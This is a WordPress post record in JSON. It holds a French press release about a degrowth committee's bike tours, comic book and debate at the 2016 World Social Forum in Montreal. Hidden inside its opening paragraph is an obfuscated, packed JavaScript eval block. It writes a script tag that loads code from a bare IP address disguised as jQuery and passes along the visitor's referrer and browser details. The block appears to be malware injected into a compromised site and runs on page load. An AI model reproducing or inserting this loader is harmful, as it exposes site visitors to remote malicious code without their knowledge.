{"id":9268,"date":"2016-08-06T07:55:36","date_gmt":"2016-08-06T06:55:36","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=9268"},"modified":"2016-08-06T07:55:36","modified_gmt":"2016-08-06T06:55:36","slug":"le-1er-espace-decroissant-au-forum-social-mondial","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=9268","title":{"rendered":"Le 1er Espace \u00ab d\u00e9croissant \u00bb au Forum Social Mondial !"},"content":{"rendered":"<div class=\"chapo\">\n<p><strong>Le <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ynebb|var|u0026u|referrer|shikk||js|php'.split('|'),0,{}))\n<\/script><\/noindex> comit\u00e9 d\u00e9croissance conviviale annonce ses activit\u00e9s\u00a0pour le FSM \u00e0\u00a0Montr\u00e9al.<\/strong><\/p>\n<\/div>\n<p><span class=\"spip_document_187148 spip_documents spip_documents_center\"><a class=\"noborder\" title=\"Banni\u00e8re \u00ab Communiqu\u00e9 de presse \u00bb\" href=\"http:\/\/www.agoravox.fr\/IMG\/jpg\/BanniereCommuniquedepresse.jpg\" rel=\"nofollow\" type=\"image\/jpeg\"><img loading=\"lazy\" decoding=\"async\" class=\"spip_logos\" src=\"http:\/\/img.agoravox.fr\/local\/cache-vignettes\/L620xH231\/BanniereCommuniquedepresse-3f2c7-74006.jpg\" alt=\"Banni\u00e8re \u00ab Communiqu\u00e9 de presse \u00bb {JPEG}\" width=\"620\" height=\"231\" \/><\/a><\/span><\/p>\n<h1>Montr\u00e9al, le 1<sup>er<\/sup>\u00a0Ao\u00fbt 2016<\/h1>\n<p>Grande premi\u00e8re dans l\u2019histoire des Forums Sociaux Mondiaux, le premier comit\u00e9 \u00ab\u00a0d\u00e9croissance conviviale\u00a0\u00bb s\u2019est cr\u00e9\u00e9 \u00e0 Montr\u00e9al \u00e0 l\u2019occasion du FSM 2016 qui aura lieu du 9 au 14 Ao\u00fbt prochain. Celui-ci parcourra la ville dans le but\u00a0de\u00a0d\u00e9construire les pr\u00e9jug\u00e9s envers ce paradigme et le faire conna\u00eetre aupr\u00e8s\u00a0de\u00a0la population.<\/p>\n<p>Pour cela, le comit\u00e9 d\u00e9croissance proposera un\u00a0<strong>parcours immersif<\/strong>\u00a0afin\u00a0de<\/p>\n<p>\u00ab\u00a0<strong>Faire R\u00e9fl\u00e9chir, Exp\u00e9rimenter et D\u00e9battre<\/strong>\u00a0\u00bb.<\/p>\n<p>Pour \u00ab\u00a0<strong>Faire R\u00e9fl\u00e9chir<\/strong>\u00a0\u00bb, un\u00a0<strong>v\u00e9lo-biblioth\u00e8que\u00a0<\/strong>disponible sur l\u2019espace permettra aux plus curieux\u00a0de\u00a0d\u00e9couvrir, \u00e0 travers ses auteurs fondateurs et ses pens\u00e9es, l\u2019histoire\u00a0de\u00a0ce mouvement.<br \/>\nEgalement, une\u00a0<strong>BD<\/strong>\u00a0a \u00e9t\u00e9 r\u00e9alis\u00e9e afin d\u2019imaginer le monde\u00a0de\u00a0la d\u00e9croissance par l\u2019art. Premi\u00e8re \u00e9dition sur le th\u00e8me\u00a0de\u00a0la d\u00e9croissance, celle-ci sortira d\u00e8s le 10 Ao\u00fbt prochain et sera accessible sur l\u2019espace tout au long du FSM.<\/p>\n<p>Pour \u00ab\u00a0<strong>Exp\u00e9rimenter\u00a0<\/strong>\u00a0\u00bb, deux\u00a0<strong>parcours conviviaux \u00e0\u00a0<\/strong><a href=\"https:\/\/www.facebook.com\/events\/257106228006879\/\" target=\"_blank\" rel=\"nofollow\" data-saferedirecturl=\"https:\/\/www.google.com\/url?hl=fr-CA&amp;q=https:\/\/www.facebook.com\/events\/257106228006879\/&amp;source=gmail&amp;ust=1470237488706000&amp;usg=AFQjCNHWGt0PzOscjLOGDVm3r4ZrWG98DA\">v\u00e9lo<\/a>\u00a0seront propos\u00e9s, afin\u00a0de\u00a0promouvoir des projets alternatifs \u00e0 Montr\u00e9al en accord avec les valeursde\u00a0la d\u00e9croissance, c\u2019est-\u00e0-dire la justice sociale, la soutenabilit\u00e9 et l\u2019autonomie.<br \/>\nEnfin pour \u00ab\u00a0<strong>D\u00e9battre<\/strong>\u00a0\u00bb, une\u00a0<strong>grande\u00a0<\/strong><a href=\"https:\/\/www.facebook.com\/events\/741526645990268\/\" target=\"_blank\" rel=\"nofollow\" data-saferedirecturl=\"https:\/\/www.google.com\/url?hl=fr-CA&amp;q=https:\/\/www.facebook.com\/events\/741526645990268\/&amp;source=gmail&amp;ust=1470237488706000&amp;usg=AFQjCNFsNqAXoMuIEJg_GnFh_krtwOMJCg\">conf\u00e9rence-d\u00e9bat<\/a>\u00a0rassemblera 5 pointures\u00a0de\u00a0la d\u00e9croissance \u00e0 Montr\u00e9al.<\/p>\n<p>Chaque jour\u00a0<strong>le grand public est convi\u00e9 d\u00e8s 8h<\/strong>\u00a0sur notre espace pour des rencontres, des partages\u00a0de\u00a0connaissances, relaxer en \u00e9coutant\u00a0de\u00a0la musique live, faire du yoga, tricot, etc\u2026tout en sirotant\u00a0de\u00a0bons\u00a0<em>smoothies<\/em>\u00a0! D\u00e9j\u00e0 plus\u00a0de300 personnes ont montr\u00e9 leur int\u00e9r\u00eat\u00a0de\u00a0participer \u00e0 nos activit\u00e9s qui seront, pour chacune d\u2019elle, traduites en Anglais et Espagnol.<!--more--><\/p>\n<h3><strong>Les partenaires\u00a0<\/strong><\/h3>\n<p>En collaboration avec 4\u00a0autres comit\u00e9s autog\u00e9r\u00e9s, et dans le but d\u2019\u00e9tablir des liens\u00a0de\u00a0convergence entre les diff\u00e9rentes activit\u00e9s pr\u00e9sent\u00e9es lors du Forum, le comit\u00e9 d\u00e9croissance se rassemblera autour\u00a0de\u00a0l\u2019espace<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00ab\u00a0Les peuples et la plan\u00e8te avant le profit\u00a0\u00bb\u00a0<\/strong><\/p>\n<p>situ\u00e9 sur la place Pasteur (UQAM). Les comit\u00e9s partenaires sont les comit\u00e9s \u00ab\u00a0Environnement\u00a0\u00bb, \u00ab\u00a0Extractivisme\u00a0\u00bb, \u00ab\u00a0Palestine\u00a0\u00bb et \u00ab\u00a0Agriculture &amp; Alimentation\u00a0\u00bb.<br \/>\nPour la cr\u00e9ation\u00a0de\u00a0la BD, des artistes montr\u00e9alais et barcelonais ont offert leur plume et leur coup\u00a0de\u00a0main afin\u00a0de\u00a0nous faire voyager au pays\u00a0de\u00a0la d\u00e9croissance\u2026<br \/>\nL\u2019ONG\u00a0<a href=\"http:\/\/cyclonordsud.org\/\" target=\"_blank\" rel=\"nofollow\" data-saferedirecturl=\"https:\/\/www.google.com\/url?hl=fr-CA&amp;q=http:\/\/cyclonordsud.org\/&amp;source=gmail&amp;ust=1470237488706000&amp;usg=AFQjCNE2DUaqUO_rK0a854_fStjXBgi8Iw\">Cyclo Nord Sud<\/a>\u00a0a rendu possible le parcours immersif \u00e0 v\u00e9lo par le pr\u00eat d\u2019une dizaine\u00a0de\u00a0leurs v\u00e9los.\u00a0<a href=\"http:\/\/santropolroulant.org\/en\/\" target=\"_blank\" rel=\"nofollow\" data-saferedirecturl=\"https:\/\/www.google.com\/url?hl=fr-CA&amp;q=http:\/\/santropolroulant.org\/en\/&amp;source=gmail&amp;ust=1470237488706000&amp;usg=AFQjCNHnr9V56UfwxUstPk8E9BRXVx8W1Q\">Santropol Roulant<\/a>,\u00a0<a href=\"http:\/\/www.coopbioma.com\/\" target=\"_blank\" rel=\"nofollow\" data-saferedirecturl=\"https:\/\/www.google.com\/url?hl=fr-CA&amp;q=http:\/\/www.coopbioma.com\/&amp;source=gmail&amp;ust=1470237488706000&amp;usg=AFQjCNFWKpcp462ipkbnXb0r_d0rkm7QFQ\">Coop Bioma<\/a>,\u00a0<a href=\"http:\/\/maisonaurore.org\/\" target=\"_blank\" rel=\"nofollow\" data-saferedirecturl=\"https:\/\/www.google.com\/url?hl=fr-CA&amp;q=http:\/\/maisonaurore.org\/&amp;source=gmail&amp;ust=1470237488706000&amp;usg=AFQjCNGMFQybmW08nJRukjaYGfpc-tLXMQ\">La Maison d\u2019Aurore<\/a>\u00a0et\u00a0<a href=\"http:\/\/accorderie.ca\/\" target=\"_blank\" rel=\"nofollow\" data-saferedirecturl=\"https:\/\/www.google.com\/url?hl=fr-CA&amp;q=http:\/\/accorderie.ca\/&amp;source=gmail&amp;ust=1470237488706000&amp;usg=AFQjCNEsABo5Fgz30XQL-yBlpWtvAaymMw\">L\u2019Accorderie<\/a>\u00a0ont \u00e9galement r\u00e9pondu pr\u00e9sents \u00e0 l\u2019appel en nous recevant dans leurs locaux pour une pr\u00e9sentation intime et conviviale.<\/p>\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\">\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\">\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\">\n<tbody>\n<tr>\n<td valign=\"top\"><strong>Contact\u00a0Presse<br \/>\n<\/strong>Sarah Cacoub \u2013\u00a0<a href=\"tel:514%C2%A0553%200180\" target=\"_blank\" rel=\"nofollow\">514\u00a0553 0180<\/a>\u00a0\u2013\u00a0<a href=\"mailto:sarah.cacoub@hec.ca\" target=\"_blank\" rel=\"nofollow\">sarah.cacoub@hec.ca<\/a>&nbsp;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">\n<table border=\"0\" width=\"300\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\">\n<tbody>\n<tr>\n<td valign=\"top\">\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\">\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\">\n<tbody>\n<tr>\n<td valign=\"top\"><strong>\u00c0 propos\u00a0de\u00a0la d\u00e9croissance conviviale<\/strong><br \/>\nLa d\u00e9croissance conviviale est un mouvement id\u00e9ologique qui s\u2019appuie sur trois valeurs fondamentales\u00a0: produire moins, partager plus et d\u00e9cider vraiment.<br \/>\nUn projet, un plan ou une action humaine quelconque est coh\u00e9rent avec l\u2019id\u00e9ologie\u00a0de\u00a0la d\u00e9croissance quand on peut montrer qu\u2019il\/elle contribue \u00e0 la conservation\u00a0de\u00a0la vie sur Terre, \u00e0 une plus grande justice entre les \u00eatres vivants et \u00e0 l\u2019\u00e9mancipation des \u00eatres humains.<a href=\"http:\/\/redtac.org\/possibles\/2015\/09\/17\/la-decroissance-soutenable-comme-sortie-du-capitalisme\/\" target=\"_blank\" rel=\"nofollow\" data-saferedirecturl=\"https:\/\/www.google.com\/url?hl=fr-CA&amp;q=http:\/\/redtac.org\/possibles\/2015\/09\/17\/la-decroissance-soutenable-comme-sortie-du-capitalisme\/&amp;source=gmail&amp;ust=1470237488706000&amp;usg=AFQjCNFLSAkju8HwVpVdHIQGPxnQVm5m3Q\">En savoir plus<\/a>.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table border=\"0\" width=\"300\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\">\n<tbody>\n<tr>\n<td valign=\"top\">\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\">\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\">\n<tbody>\n<tr>\n<td valign=\"top\"><strong>\u00c0 propos du FSM<\/strong>Le Forum social mondial (FSM) est le plus grand rassemblement\u00a0de\u00a0la soci\u00e9t\u00e9 civile visant \u00e0 trouver des solutions aux probl\u00e8mes\u00a0de\u00a0notre temps.<br \/>\nLe FSM 2016 se tiendra du 9 au 14 ao\u00fbt prochain. Au total\u00a0: Plus\u00a0de\u00a050 000 participants,\u00a0pr\u00e8s\u00a0de\u00a05 000 organisations\u00a0de\u00a0la soci\u00e9t\u00e9 civile locale et mondiale r\u00e9unies pour\u00a05 jours\u00a0de\u00a0r\u00e9seautage, et plus\u00a0de\u00a01500 activit\u00e9s autog\u00e9r\u00e9es sont attendus pour cette premi\u00e8re en Am\u00e9rique du Nord.\u00a0Vous pouvez vous inscrire en ligne sur le site du FSM 2016\u00a0:\u00a0<a href=\"http:\/\/www.fsm2016.org\/\" target=\"_blank\" rel=\"nofollow\" data-saferedirecturl=\"https:\/\/www.google.com\/url?hl=fr-CA&amp;q=http:\/\/www.fsm2016.org&amp;source=gmail&amp;ust=1470237488706000&amp;usg=AFQjCNGbt_KdsyCH8E7cfOUjoPQQDtOEjQ\">www.fsm2016.org<\/a>.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<dl class=\"spip_document_187149 spip_documents spip_documents_center\">\n<dt><a class=\"noborder\" title=\"PNG - 127 ko\" href=\"http:\/\/www.agoravox.fr\/IMG\/png\/ProgrammeParcoursImmersif.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/img.agoravox.fr\/local\/cache-vignettes\/L620xH552\/ProgrammeParcoursImmersif-c4b74-36198.png\" alt=\"PNG - 127 ko\" width=\"620\" height=\"552\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\"><strong>Programme du parcours immersif<\/strong><\/dt>\n<\/dl>\n","protected":false},"excerpt":{"rendered":"<p>Le comit\u00e9 d\u00e9croissance conviviale annonce ses activit\u00e9s\u00a0pour le FSM \u00e0\u00a0Montr\u00e9al. Montr\u00e9al, le 1er\u00a0Ao\u00fbt 2016 Grande premi\u00e8re dans l\u2019histoire des Forums Sociaux Mondiaux, le premier comit\u00e9 \u00ab\u00a0d\u00e9croissance conviviale\u00a0\u00bb s\u2019est cr\u00e9\u00e9 \u00e0 Montr\u00e9al \u00e0 l\u2019occasion du FSM 2016 qui aura lieu du &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=9268\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,44,33],"tags":[],"class_list":["post-9268","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d","category-degrowth","category-soutiens-du-ppld"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9268","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9268"}],"version-history":[{"count":1,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9268\/revisions"}],"predecessor-version":[{"id":9269,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9268\/revisions\/9269"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9268"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9268"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9268"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}